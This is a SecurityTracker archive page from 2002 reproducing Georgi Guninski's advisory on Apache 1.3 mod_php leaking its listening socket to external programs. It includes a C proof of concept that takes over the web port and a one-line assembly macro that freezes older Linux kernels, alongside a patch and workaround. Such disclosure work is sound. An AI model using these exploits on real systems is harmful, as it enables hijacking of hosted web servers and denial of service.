SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Apache mod_php Vendors:   Apache Software Foundation
Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
SecurityTracker Alert ID:  1005548
SecurityTracker URL:  http://securitytracker.com/id/1005548
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 6 2002
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): 1.3
Description:   A vulnerability was reported in the Apache web server's mod_php component. A local user may be able to control the web server port.

Georgi Guninski reported that if a user is permitted to execute external programs using mod_php and if safe_mode is off, the user can control the web server port in some cases.

According to the report, mod_php inherits the open listening httpd socket when it launches an external application. A specially crafted external application can reportedly exploit this behavior to control the listening port and act as a web daemon.

This may be a particular issue in hosting environments.

Some demonstration exploit code is provided in the Source Message and at:

http://www.guninski.com/php1.html

The vendor(s) have reportedly been notified.

Impact:   A local user (or remote user with local access) can create code that, when called by Apache mod_php, will take control of the listening web port.
Solution:   No solution was available at the time of this entry.
Vendor URL:  httpd.apache.org/ (Links to External Site)
Cause:   Resource error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Fun with mod_php/Apache 1.3, yet Apache much better than II$


Georgi Guninski security advisory #58, 2002

Fun with mod_php/Apache 1.3, yet Apache much better than II$

Systems affected:
Apache 1.3/mod_php (safe_mode off)
linux kernel < 2.4.19 (different issue)

Risk: Very Low
Date: 6 November 2002

Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases".
If you want to link to this content use the URL:
http://www.guninski.com/php1.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:
I. If a user can execute external programs from mod_php/Apache 1.3 and
safe_mode is off, then he can take over the httpd port in at least 50%
   of the cases. This may lead to emulating the whole apache server - to a
visitor the whole apache server seems under the attacker's control.
Won't be suprised if A$P is also affected from similar attack - check
handles to device\*.

II. It is possible to lock linux kernel < 2.4.19 with the help of lcall7
and the TF. Note: While I discovered this independently, credit for this
should go to someone else - check
http://www.thefreeworld.net/non-US/
kernel-2.4.19-sec

Details:

I. When mod_php launches an external application, it inherits the open
listening httpd socket. With the help of fork(), dup() close() and accept(),
external application may turn itself into listening httpd server. Check [1]
for a demo. The C proggie must be called from mod_php.
This may have impact on providers hosting mod_php or in
combination with a bug which executes php code.

II. The following asm freezes kernel < 2.4.19
#define MSUX "mov $0x100,%eax\npushl %eax\nmov $0x1,%eax\npopfl\nlcall $7,$0"


Workaround/Solution:
I. turn "safe_mode" in php.ini to "on" or try the following unofficial patch,
which works for me, but comes with no warranty - it makes the listening
socket "close on exec" in apache:
----------------------------------------
   The following patch works for me on linux (for apache 1.3.26/Linux):

*** src/main/http_main.c.old    Sun Oct 20 14:13:47 2002
--- src/main/http_main.c        Sun Oct 20 14:44:18 2002
*************** static int make_sock(pool *p, const stru
*** 3784,3792 ****
--- 3784,3795 ----
           GETPRIVMODE();
     #endif

+ if (fcntl(s,F_SETFD,FD_CLOEXEC)== -1) ap_log_error(APLOG_MARK, APLOG_CRIT,
   server_conf, "make_sock: could not do F_SETFD");
         if (bind(s, (struct sockaddr *) server, sizeof(struct sockaddr_in)) == 
-1) {
           ap_log_error(APLOG_MARK, APLOG_CRIT, server_conf,
                "make_sock: could not bind to %s", addr);
+ // by georgi
+
     #ifdef MPE
           if (ntohs(server->sin_port) < 1024)
               GETUSERMODE();
------------------------------------
II. linux kernel 2.4.19 is not vulnerable, update to it.


Vendor status:
I. Apache and php were notified on Tue, 15 Oct 2002 18:16:40 +0300
The Apache guys seem to prepare a fix. The php guys replied this is known
for ages but did not provide reference for the claims.
II. This is fixed in 2.4.19 and credit should go to someone else.

References

[1]
----tcp4.c----
/*	TCP Example code by Kien Pham (Heavily documented to help others understand.)
	This code is now in Public Domain.
	Look ma, I did this all by myself.	*/

/*
This proggie was taken somewhere from the net as a socket example
Changed a little for interaction with mod_php -- georgi
*/

#include<sys/socket.h>	// Include these for socket(), connect(), bind(), etc.
#include<sys/types.h>
#include<netdb.h>		// Include this for getprotobyname()
#include<string.h>	// Include this for memset()
#include<netinet/in.h>	// Include this for htonl(), htons(), etc.
#include<unistd.h>

#define	PORT	2000

#define THEFD	16

#define INSIZE 20000

void	servermsux()
	{
	 // Variables for the server component of the application.

	 int file_descriptor;	// File descriptor that represents the server socket.
	 struct	sockaddr_in	server_address;	// Really only contains the port we want to
listen on.
	 int	inbound_connection;	// File descriptor that represents the socket of the
inbound connection.
	 struct	sockaddr_in	inbound_address;	// Address of the inbound connection.
	 int	inbound_address_size;	// Size of the structure for the inbound connection.
	 unsigned	char	*address_holder;	// Pointer to simplify the extraction of IP
addresses.
	 char	message[]="HTTP/1.1 200 OK\nContent-Type: text/html\n\n"
		"<h1>Hi<br>MSUX</h1>";	// Constant string to send to the client.
	 char	buffer[INSIZE];		// Buffer to hold incoming data from the client.

	 // Code for the server component begins here.

	file_descriptor=dup(THEFD);

	 if	(file_descriptor<0)	// Check to see if there was a failure in allocation.
		{
		 perror("Server: socket()");
		 return;
		}
	if (close(THEFD) == -1) {perror("close");return; };
	close(1);close(3);	
while(42)
{
	 memset((void*)&inbound_address, 0, sizeof(inbound_address));
	 inbound_address.sin_family=AF_INET;
	 inbound_address_size=sizeof(inbound_address);	// Make sure you do this, or the
inbound_address will not be filled with information about the incomming address.
	 inbound_connection=accept(file_descriptor, (struct
sockaddr*)&inbound_address, &inbound_address_size);	// Grab the first socket
that represents the client that has connected. If none yet, block and wait till
somebody does.
	 if	(inbound_connection<0)
		{
		 perror("2 accept()");
		 return;
		}
	 address_holder=(unsigned char*)&inbound_address.sin_addr.s_addr; // Save
ourselves a call to the OS to convert.
	
	 if	(read(inbound_connection, buffer, INSIZE)<0)	// Read from the client.
		{
		 perror("2 Server: read()");
		 return;
		}

	 if	(write(inbound_connection, message, sizeof(message))<0)	// Write the
message to the client.
		{
		 perror("2 Server: write()");
		 return;
		}
	 close(inbound_connection);	// Tell the OS to clean up and free resources that
we have used.
} //while
	 close(file_descriptor);
	}


int	main(void)
	{
	 printf("\n2 TCP Networking Injection Example\n");
//	 printf("Written by Kien Pham\n");
//	 printf("For the Networking mini-Tutorial (http://www.tripod.com/~Xengren)\n");
	 if	(!fork())	
		servermsux();

	}

----end-------


Regards,
Georgi Guninski
http://www.guninski.com






----------------------
You may visit Guninski Security Mailing List page at
http://www.guninski.com/mailinglist.html
----------------------


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC